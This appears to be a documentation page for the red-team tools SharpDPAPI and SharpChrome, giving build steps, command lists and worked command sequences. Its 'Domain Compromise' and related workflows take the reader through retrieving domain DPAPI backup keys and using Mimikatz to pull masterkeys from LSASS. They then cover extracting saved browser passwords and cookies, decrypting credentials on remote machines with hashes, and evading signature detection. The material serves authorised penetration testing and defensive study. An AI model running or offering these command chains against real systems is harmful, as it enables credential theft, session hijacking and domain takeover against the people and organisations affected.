Skip to main content

Build Requirements

Visual Studio

Visual Studio 2019 Community Edition or later

.NET Framework

.NET Framework 3.5 (default) or .NET 4.0/4.5

Git

For cloning the repository

Windows OS

Windows build environment required

Compilation Steps

1

Clone Repository

git clone https://github.com/GhostPack/SharpDPAPI
cd SharpDPAPI
2

Open Solution

Open SharpDPAPI.sln in Visual Studio 2019 or later
3

Select Build Configuration

  • Choose Release configuration (not Debug)
  • Target platform: Any CPU
4

Build Projects

  • Build → Build Solution (or press Ctrl+Shift+B)
  • Both SharpDPAPI.exe and SharpChrome.exe will be compiled
5

Locate Binaries

Compiled binaries will be in:
SharpDPAPI/SharpDPAPI/bin/Release/SharpDPAPI.exe
SharpDPAPI/SharpChrome/bin/Release/SharpChrome.exe

Targeting Different .NET Versions

SharpDPAPI defaults to .NET Framework 3.5 for maximum compatibility. However, you can retarget to newer versions:
  • .NET 3.5 (Default)
  • .NET 4.0 / 4.5
Advantages:
  • Maximum compatibility
  • Runs on most Windows systems by default
  • Preferred for operational use
Disadvantages:
  • May not be installed on newer systems
  • Requires installation if not present
No changes needed - this is the default configuration.
If you change the target framework, ensure the target system has the appropriate .NET version installed.

Binary Distribution

SpecterOps does not provide pre-compiled binaries for SharpDPAPI or SharpChrome. You must compile from source.
Why no binaries?
  • Encourages understanding of the code
  • Prevents signature-based detection
  • Allows for customization
  • Avoids potential legal issues

Running SharpDPAPI

  • Direct Execution
  • PowerShell Wrapper
  • PSRemoting
  • Execute-Assembly
# Basic execution
SharpDPAPI.exe

# Show command help
SharpDPAPI.exe --help

# Execute specific command
SharpDPAPI.exe triage /pvk:key.pvk

Command Line Syntax

SharpDPAPI

SharpDPAPI.exe <command> [arguments]
Available Commands:
  • backupkey - Retrieve domain DPAPI backup key
  • masterkeys - Decrypt user masterkeys
  • credentials - Decrypt Credential Manager credentials
  • vaults - Decrypt Windows Vault data
  • rdg - Decrypt RDP connection passwords
  • keepass - Extract KeePass master keys
  • certificates - Decrypt certificate private keys
  • triage - Run all user commands
  • ps - Decrypt PowerShell credential XML
  • blob - Decrypt arbitrary DPAPI blob
  • search - Search for DPAPI blobs
  • sccm - Extract SCCM credentials
  • machinemasterkeys - Decrypt machine masterkeys
  • machinecredentials - Decrypt system credentials
  • machinevaults - Decrypt system vaults
  • machinetriage - Run all machine commands

SharpChrome

SharpChrome.exe <command> [arguments]
Available Commands:
  • logins - Extract and decrypt saved passwords
  • cookies - Extract and decrypt cookies
  • statekeys - Extract AES state keys
  • backupkey - Retrieve domain DPAPI backup key

Quick Start Examples

# Decrypt current user's RDP passwords
SharpDPAPI.exe rdg /unprotect

# Extract current user's Chrome passwords
SharpChrome.exe logins

# Extract current user's Chrome cookies
SharpChrome.exe cookies /url:".*company\.com.*"

# Triage all machine DPAPI data
SharpDPAPI.exe machinetriage

# Use Mimikatz to get masterkeys
# mimikatz# sekurlsa::dpapi

# Triage user data with masterkeys
SharpDPAPI.exe triage {GUID1}:SHA1 {GUID2}:SHA1
SharpChrome.exe logins {GUID1}:SHA1 {GUID2}:SHA1

# 1. Get domain backup key
SharpDPAPI.exe backupkey /file:key.pvk

# 2. Triage local system
SharpDPAPI.exe triage /pvk:key.pvk
SharpChrome.exe logins /pvk:key.pvk
SharpChrome.exe cookies /pvk:key.pvk

# 3. Triage remote systems
SharpDPAPI.exe credentials /pvk:key.pvk /server:workstation.domain.com
SharpChrome.exe logins /pvk:key.pvk /server:workstation.domain.com

# Copy DPAPI data from target to analysis machine

# Decrypt with known password
SharpDPAPI.exe credentials /target:C:\Evidence\Credentials /password:Password123!

# Decrypt Chrome data with backup key
SharpChrome.exe logins /target:"C:\Evidence\Login Data" /pvk:key.pvk

Common Workflows

Workflow 1: Domain Compromise

# Step 1: Retrieve domain backup key (requires DA)
SharpDPAPI.exe backupkey /server:dc.domain.com /file:backup.pvk

# Step 2: Triage all users on current system
SharpDPAPI.exe triage /pvk:backup.pvk
SharpChrome.exe logins /pvk:backup.pvk
SharpChrome.exe cookies /pvk:backup.pvk /url:".*aws.*" /format:json

# Step 3: Remote system enumeration
SharpDPAPI.exe credentials /pvk:backup.pvk /server:workstation1.domain.com
SharpDPAPI.exe credentials /pvk:backup.pvk /server:workstation2.domain.com
SharpChrome.exe logins /pvk:backup.pvk /server:workstation1.domain.com

Workflow 2: Local System Compromise

# Step 1: Extract masterkeys from LSASS with Mimikatz
# mimikatz# privilege::debug
# mimikatz# sekurlsa::dpapi

# Step 2: Save masterkeys to file (format: {GUID}:SHA1 per line)
# {8abc35b1-b718-4a86-9781-7fd7f37101dd}:ae349cdd3a230f5e04f70fd02be69e2e71f1b017
# {feef7b25-51d6-4e14-a52f-eb2a387cd0f3}:f9bc09dad3bc2cd00efd903a9b61c42e6c9ab0f4

# Step 3: Triage with masterkey file
SharpDPAPI.exe triage /mkfile:masterkeys.txt
SharpChrome.exe logins /mkfile:masterkeys.txt

# Step 4: Machine triage (requires elevation)
SharpDPAPI.exe machinetriage

Workflow 3: Credential-Based Access

# If you have a user's password
SharpDPAPI.exe credentials /password:SecurePassword123
SharpDPAPI.exe vaults /password:SecurePassword123
SharpChrome.exe logins /password:SecurePassword123

# If you have NTLM hash
SharpDPAPI.exe credentials /ntlm:8846F7EAEE8FB117AD06BDD830B7586C
SharpChrome.exe cookies /ntlm:8846F7EAEE8FB117AD06BDD830B7586C

Output Management

  • Console Output
  • File Output
  • Formatted Output
Default behavior - prints to console:
SharpDPAPI.exe credentials /pvk:key.pvk
Good for: Interactive use, immediate feedback

Troubleshooting

Problem: Solution won’t buildSolutions:
  • Ensure Visual Studio 2019+ is installed
  • Verify .NET Framework 3.5 is installed
  • Clean solution (Build → Clean Solution)
  • Rebuild solution (Build → Rebuild Solution)
  • Check for missing NuGet packages
Problem: Target system doesn’t have .NET FrameworkSolutions:
  • Install .NET Framework 3.5: 
    # Windows 10/11
DISM /Online /Enable-Feature /FeatureName:NetFx3 /All

# Or via PowerShell
Enable-WindowsOptionalFeature -Online -FeatureName NetFx3 -All
  • Or recompile for .NET 4.0/4.5
Problem: Commands run but no data is decryptedSolutions:
  • Verify decryption method is correct:
    • Using /unprotect? Must run as target user
    • Using /pvk? Must have valid backup key
    • Using masterkeys? Must have correct GUIDs
    • Using /password? Must be correct password
  • Check if DPAPI data exists:
    • Credentials: %LOCALAPPDATA%\Microsoft\Credentials\
    • Vaults: %LOCALAPPDATA%\Microsoft\Vault\
    • Chrome: %LOCALAPPDATA%\Google\Chrome\User Data\Default\
Problem: Access denied when reading filesSolutions:
  • For user DPAPI: Run as target user or use valid decryption method
  • For machine DPAPI: Must run as Administrator
  • For remote systems: Must have admin access to target
  • For domain backup key: Must have Domain Admin privileges
Problem: Chrome logins/cookies won’t decryptSolutions:
  1. First decrypt the state key: 
    SharpChrome.exe statekeys /pvk:key.pvk
  2. Then use the state key: 
    SharpChrome.exe logins /statekey:EXTRACTED_KEY
  3. Or use automatic decryption: 
    SharpChrome.exe logins /pvk:key.pvk
    (SharpChrome will automatically handle state key decryption)

Operational Security

Consider these OPSEC factors when using SharpDPAPI/SharpChrome in operations:
  • Detection Vectors
  • Mitigation Strategies
  • Alternative Execution
  • File reads of sensitive DPAPI locations
  • LSASS access for DPAPI_SYSTEM secret
  • Process execution of SharpDPAPI.exe/SharpChrome.exe
  • Network SMB access to remote systems
  • Domain controller backup key retrieval
  • Bulk credential file access

Additional Resources

GitHub Repository

Source code and latest releases

DPAPI Attack Guide

Operational guidance for DPAPI abuse

Mimikatz Wiki

Understanding Credential Manager and DPAPI

Visual Studio Community

Download Visual Studio for compilation

Next Steps

SharpDPAPI Overview

Learn about DPAPI and SharpDPAPI capabilities

SharpChrome Overview

Browser credential extraction guide

Command Reference

Detailed command documentation

Example Scenarios

Real-world usage scenarios